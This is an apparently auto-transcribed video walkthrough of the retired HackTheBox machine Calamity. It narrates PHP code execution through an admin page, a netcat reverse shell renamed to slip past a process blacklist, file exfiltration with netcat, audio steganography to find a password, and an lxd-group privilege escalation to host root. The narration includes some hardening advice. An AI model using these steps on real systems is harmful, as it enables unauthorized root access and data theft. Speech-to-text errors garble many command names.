HackTheBox - Calamity

what's going on YouTube this is epic and it is that time calamity is retired soon you'll know how to get root on calamity but it's not the route you are looking for unfortunately I don't have enough time right now to properly step through the binary on calamity instead you're gonna get a unintended Prive ask that the user Boosh has been using on several over a half the box machines I'm assuming if they were unintended on our machines it probably will be in other boot two routes as well as useful on pentest engagements if you want to know more about that a link is in the description to his blog or you can stay tuned and watch the video the TLDR is the Linux containers can provide root access if users are a member of the lxd user group so definitely check that once knowing the method all we had to do was check the output of Linn enum SH or Lin proof checker pie to see if boxes were vulnerable it is that obvious because again it's just who is a member of a user group which makes it even cooler that we only know if one person that has exploited a box this way and how many hours have been spent doing it the hard way is probably a unfathomable number because the binary on calamity is tough anyways let's jump in and get to that profess that I know you all want before we do anything we have to end map the box so we'll do that with a map - SC for default scripts SV enumerate version Oh a for output all formats call the file calamity and then the IP address calamity which is ten ten ten twenty seven take some time to run so I've already ran it looking at the output we do have SSH and HTTP listening can't do much with SSH so let us look at HTTP we can go to the IP address ten ten ten twenty seven and we get a web page Saad that okay some reason the image wasn't loading but there we go web page is there we can test a few things right off the bat like slash robots.txt and like slash admin don't look at the source code of the page nothing there so let's throw it in go Buster to try to find information so we do slash opps go Buster and we have to dash H one thing worth noting is go Buster just updated 1.4 is the newest version I'm on 1.3 still but if use go Buster be sure to update so looking at the usage of go Buster we will want to do a dash W for the word list and that's going to be user share word list der buster directory list to three medium it's the one I normally use - x4 file extensions we want to search will do PHP HTML and then let's see - you for the URL HTTP 10 10 10 27 - t for threads or do 25 threads so right off the bat we have a few folders slash uploads and slash admin dot PHP so let's check it out uploads is blank and we have admin dot PHP which is a user login form so we'll just do admin admin gets a failure if we look at the source code we do see something odd and we have a scroll bar if we scroll all the way to the right it's stupid I know but we have a password scoop it Oh Tecna so I don't even know what this is so let's do that in Google Translate if it's stupid I know I'm gonna laugh come on translation that's a word no way yeah so I don't know what that is but that is gonna be the password so if we copy that the other thing to note we have password username but the fields name equals user name equals past so they're reversed maybe that was a hint to look at the webpage to us but put the username and password login and we get to the page so we see a lot of talk about pro on PHP HTML harmless we can write HTML and it parses it so if we control you'd view the source we see that HTML if we do a PHP tag system will just do LS - la show me the page and we get LS output so easy code execution right there just execute PHP so let us do a reverse shell oh and see well first if configured our IP and then LV MP 1 2 3 4 or IP is gonna be 14 23 and that'll be important to remember whenever I do reverse shells I just got a pen test monkey reverse shell come on this netcat one is really reliable so that's what I'm going to start off with I'm going to do PHP that slash PHP change your IP we were fourteen dot 21 to 314 dot 23 copy this show me the page did not work so let us do that into burp and do our own encoding on it so test edit this go to put proxy send a repeater paste that in and we can see this is also it's a messed up so it's always helpful to be able to look at everything you're typing instead of just a small text box I forgot the question mark right before the PHP tag and I need put system between this because all that is not just raw PHP code so that around system so it executes that and now we should be able to encode this go look at that we have a shell and it just dies so I'm gonna try that again because at first I was a bit puzzled by this shell and it dies so my thing was let's see let's call this shell and we'll create a new tab and we'll call this commands what I did next was simplify this and verify I could just run system commands so as a sanity check let's just do an LS plus a semicolon sleep ten seconds and we'll do Who am I click go this should probably take about ten seconds to run and my main thing is I'm trying to see if the process actually finishes because that cat died almost instantly and we see the whole thing finished so we know it's on the issue executing commands my next thing was I did a find plus slash home to see what files are there and I could do Etsy and other directories as well cannot assign address not available go okay that was on and we get a lot of files so I'm going to simplify this a little bit and just do + - c time - 60 and that's gonna say hey find me all the files that have been modified within the last 60 minutes and home only get one file home salvus intrusions so let's look at that file if we do cat on the filename we have things saying blacklisted process on netcat python SH so let's change the process so we're no longer netcat we can just see P slash bin and C - slash dev sh m and C and this is just the RAM disk it'll go away once it reboots so if we do that and then go back to our shell actually know we have to change the name we just did nothing there we'll call it it and then we will also chmod it to be 755 go back here Wood says net cat and we'll do dev sh m /nc turn this on click go we get a shell and it died because I didn't specify it there we go click go and we get a shell and it looks like it's no longer dying awesome so we have loperamide shell on the box Python was also one of those blacklisted processes so I'm not going to improve my tty because it'll just die so let's poke around at what we have we got home salvus and going in that we have that user dot text reeked of dot wave LS own app can't get in it LS dash away so we can see what's directories and what's not let's go into alarm clocks we got Rick dot wave and Zoras dot mp3 I don't know what that is but let's copy all this follows to our box so let's open up a new pane and do salvus files so if you NC and V MLP and we'll call this port 88 now three nines I don't know why thing a port was hard but it was and then we'll just send this to what's the Rick dot wave go back here slash dev hey such em if then we have to go to our IP which is ten ten fourteen twenty three four nine nine nine and we're gonna send Rick dot wave wave paste you got a connect finished md5 sum Rick dot wave md5 sum dot wave got the same exact file on both ends so let us do the next file which is I'm gonna try to pronounce that or type it where is it there it is send that file and then database gem up ten ten ten 14:23 and then the last fall we had was reek of dot wave so we were send all three of those and out of habit I gave them mp3 extensions I'll fix that in a second I don't know what my mind is today okay let's fix this everybody done that one what was the last one Rick Rick is good okay they are all WAV files now so the only thing left to do is try to open one of the files and see what it is so open reeked of dot wave and it didn't open so I think turtle may be a player and we don't have any sound let's turn this up so I'm not sure if you heard that it's hard to share sound between my VM and recording application I'm sure it's possible I just don't have time to do it so I played it really loud hoping my headphones pick it up if you couldn't tell that is rickroll so the next thing to do is I guess test all the waves so Rick dot wave got it again and then the last file was that z1 so let's look at what this is so we got three files we could do eggs if tool one of them to see if there's anything hitting them see nothing there really nothing there a comment isn't this where we came in but nothing really in any of the files that EXIF data though is gonna give us a different md5 sum so we don't know if the wav file and reek of is the same as in rick so what I did is I did a pip install audio diff and we can pull up the man page here it's a Python application audio diff and why is that going quick come on load proxies disabled what's going on Sept off I guess it's enabled here I was stupid and was lazier something in it do foxy proxy there we go anyways audio deaf yep don't want that one I want read the docs this kind of explains it you can do pip install then import and we have audio equal so let's try that I've already installed it so just do Python import audio diff and then they just did audio diff audio equals so reeked of dot wave and Rick dot wave and we have the actual waves not equal to it so this is where it's a little steganography challenge and you have to kind of think like the creator why would he have two files that are really similar the same song but have different waves why isn't the rickroll the same wave on both of these files and the answer is well let's inverse the files so we'll take the inverse of Rik dot wave and plan again streak of dot wave and see if there's anything hidden in the data if you don't know how wave lengths work and sound but I don't really know either but if you play the exact inverse of a wave it cancels out and you don't hear anything so that's how like noise cancelling headphones work and noise cancelling headphones have a microphone so they can play the inverse of the wave on what's outside of the headphone but at least that's how some of them work and that's why they require batteries so the easiest way to do that is through a tool called audacity and fail to open sound device that's always awesome file let's see if a place documents HDB boxes calamity I can't hear anything well that's not gonna be helpful no try it again at first you don't succeed try try and try again still nothing sound is on and it I'm going to pause this and we're doing my host machine that would be easier okay and we're now on my host so let us import audio we can import Rik dot wave and file import reeked of dot wave so if we play these files they sound exactly the same but we can highlight everything and go to in fact effect invert and that all invert them again that should have inverted against each other let's try that again effect invert and we get some weird stuff and once we get near the end we get something else come on so if you remember from the beginning I can't easily go back to my calorie but there was an exist AG that said something about a loop so if we play this so 185 so do 185 and go to the very beginning which is a good place to start for 79 think that's it I think that'll be the password for calamity if you weren't about my interface I use I three personally so that's how I open that terminal so quick and it split it just like T MUX so copy this and go over into my caveum so there full screen and it wasn't as ER to get to Kali as I thought I don't know what I was thinking but we can close that did copy so the user was salvus so SSH is Elvis at ten ten ten twenty seven put the password in and we get in so that's how we did that beauty I don't like that sound and on this box my first thing was I don't want to do this good luck binary it's an application gift do multiple flows to get it so I thought about looking at intrusions and my first guess was okay well if he's just doing like Oh s dot kill or during a peak he'll syscall on filenames so it was like P kill gibberish and we can do sleep 5 and we see it execute sir sleep 5 command so if we can get sleep 5 in here and he's just passing it natively to assist call we maybe all get code execution so that was the very first thing I did it's not successful but it's a cool test so touch and we'll test sleep a hundred and we should do and see that we look at the file we didn't want that backslash so our m and c go back here copy this create that file and then win a copy the actual executable NC to that and then we can chmod it to be seven five five and LV NP listen report let it get killed do a psdf grep for sleep and unfortunately we don't see it so we didn't have code execution there we can look at intrusions and see we did pass it so he has some type of filtering in that script I actually don't know what it is I didn't look when I got roost the last time but now it's time to do the unintended route with which we call it lxd containers LXE so let's jump in apologies for the choppiness but I did want to make a quick edit after I watched the video to stress the fact that this may primarily be a boot to route type issue and not some crazy security issue because the use case for this exploit does require the member being a member of sudo or the first user installed with the system and production use cases those users are considered admins anyways in boot to route or CTFs use case generally we're lazy and install a system we get a user with that installed system and try to strip admin and overlooked one small detail that left an admin privilege on the user so the boot to root CTF use case is much better in the production but it's gonna look bad additionally if we did things that people should be doing in production and following like security hunting guidelines when installing things we would have noticed that the default ubuntu install work creates a user account during install da however it is recommended that this account should be considered administrator and not assigned to the end user of the device so again if we follow that this is a non-issue and that's essentially what the github requests will be saying why they closed it and saying hey members of this should be considered admin anyways but in the end should be documented a little bit better and of course DISA stink checks should be able to catch things like this so if you follow proper hardening then hopefully this isn't a issue in production and this just stresses the fact that you should follow compliancy because in hindsight most things that are major exploits the impact would have been lessened if you followed some type of compliancy so all that being said let's jump in and actually see the route so it is worth mentioning that this probably affects a lot of other virtualization technologies so being members of the docker qmu KVM libvirt whatever groups could be dangerous and you should look into that as prevx things because those generally need elevated privileges on the hosts LXE is just what we're looking at in this video but I'm sure other things are affected as well so it's just one of those things sysadmin should be extra careful when doing some things back in 2016 we see this issue was reported these commands are worth noting because they do still work so essentially it's just saying yeah it's kind of a requirement for these applications to work be careful who is in the lxd group which is a valid response and then in 2017 another user I believe this is booze created request saying hey there's a probe ask if you're a member of the lxd group and the response is essentially saying yes at the time of install lxd adds members of the pseudo group to the lxd group so they can actually use the LXE application and it's not really that much of a security risk because if they're in the pseudo group they should be allowed to become route anyways this a little bit of a misnomer but again it comes down to at the time of install it's probably fine for them to have that access because they were rude but when you heard in a box things like this can get overlooked just because you don't realize the impact of lxd groups in general so be careful with that and then we do have Burgess blog which is in the description that explains how to exploit this so let us begin create a new shell the first thing I'm going to do is download lxd Alpine Builder because number one well first of all what LXE is it's a Linux container it's kind of like a VM it's not full virtualization it's some virtualization you can look more into it there but if we just try to do Ubuntu then image is going to be really big so we're gonna create a Alpine Linux image which is really small it's like a gigabyte versus two megabytes and number two heck the box does have access to the Internet so we can't pull Ubuntu image easily so we're going to get clone on the repository and then go in here and just build Alpine - a for architecture and we want 32-bit which either I 686 or I three six should work start installing it and once this finishes we should have a tar file so LS dash L way we do and we're going to SCP that to calamity so let's cap to claim these password get this I don't know what I just did I guess resized it there we go SCP Alpine - ten ten ten twenty seven and we specify salvus paste it and we can SSH data just work in this directory so it's a little cleaner we don't have other files and we can remove that netcat so stop that slash and see okay so the very first thing we have to do is import this image into LXE so we can do that with LXE image import and specify the name and I think we do aliases just a space in this command see if that works hopefully it does it'll take about a minute to import this and essentially what this is doing is just unzipping this and building a machine that is deployable the next step is gonna be to be a net which actually creates the machine this is just creating the machine template so so it looks like that second thing didn't help me at all since it has air opening so let's LXE image list see if it imported it did not we'll try - - alias Ilyas alpine there we go it imported the image so LXE image list we have the image there so we can do the an it to actually create a machine so LXE a net alpine will call this machine Prive ask - the security dot privileged equals true I don't know exactly what this flag does but it was said to do it in the github so we create the machine so we can just do LXE list to list machines that is different than LXE image list so the next thing is to add a hard drive to this so as said in the github lxc config device add blah root disk so well going to do is LXE config device add so a host that we're adding it is pretty esque and we're going to call the device host - root and next thing will be source equal slash path equal slash mount / root so this is telling the VM hey mount slash into / mount root and I have an error in my config awesome now this what did it say wrong number of sub command arguments LXE config daveed that's odd device ad previs cursed root I forgot to say disk it is hard to type and talk so and is it right here desk so look we did LXE container doing the config adding a device the container we're adding two is called probe esque the device we want to create is called host - root the actual type of device is disk with the source of slash and a path of slash mount / root so if we do LXE exec Prive ask slash bin sh o we have to start it LXE start grave ask and then LXE exact brave ask then SH and now we are root and if we go to slash mount / root we have a filesystem we can go into roots folder and access route text looking at the Python script that we try to exploit earlier let's see what didn't work Python open netstat chmod Oh he's not using P kill so I thought he was doing picot - 9 user input he is going through net stat grabbing pids of processes and passing the PID so our user input never makes it into the OS dot system command so no profess there that's why it didn't work but one thing I wanted to test real quick is I don't have LXE installed on my you bun to host and I want to see if it actually adds every user of the pseudo group so we have a Ubuntu host with LXE not installed what we're going to do is verify that upon install ads users of the psuedo group to the lxd group so first thing to do is let's be a dumb admin and heard in the pseudo a file now that's the password for my account in this box I didn't realize it won't even ask me for a password but anyways let's go to su doors and remove that so even though it is a member of the pseudo group he can't sudo because we removed that ability the way we know how we didn't think to remove the group we just removed it from the file so if we do a [Music] su now to get back to root we're there so let us install lxd apt install get some scheduled tasks is running now let's see client there we go we run the fake race yeah we won the fake race but anyways we are now installing lxd and it should add a user to the lxd user group and then we're going to try the probe ask again so okay su - it groups and I am a member of lxd and I can't sit oh but I'm a member of the group so I should be considered as admin on the server so let us go pull the package and I just realized I don't have get so apt install get yes and let's see Alpine lxd github Alex Egan hub Alex T maybe there we go oh it's the Alpine builder so we can get clone that CD in there build Alpine move this to it okay so now let us just read run what we did so Alex remind me later LXE image import Alpine - - alias Alpine stuck your container okay it is imported so we do LXE image list we see it's there so next step is to take the image and create a container so LXE annette alpine and we will call it prove X and add that - see security privileged equals true flag no storage pool found so let's run lxd and knit like it says leave everything as auto okay and go again so we created the previous container so next thing we can do is LXE config device ad-free vask root disk was it her stash root we use just because that it could be anything but it just makes logical sense to me the name of that disk source equal slash path equal slash mouth root okay it's been added now lexi exec on probe ask then Sh i forgot to start it again we a root if we go to slash mount root and yes we are now root on the host OS so be careful with installing virtualization technologies just because what they may add you to groups it makes sense because the applications have to do these things it's just one of those things of admins not fully reading exactly what is intended and that's why almost every hardening script will say things like make sure users are not members of groups they don't need to be because of things like this i don't know what the ADM group does but i'm assuming i want to be a member of it or the pseudo group if I'm not using pseudo and even I am using pseudo I may just hard code my username to have limited sudo privileges so be careful what you give users a member of groups but I hope you enjoyed the video that'll be it take care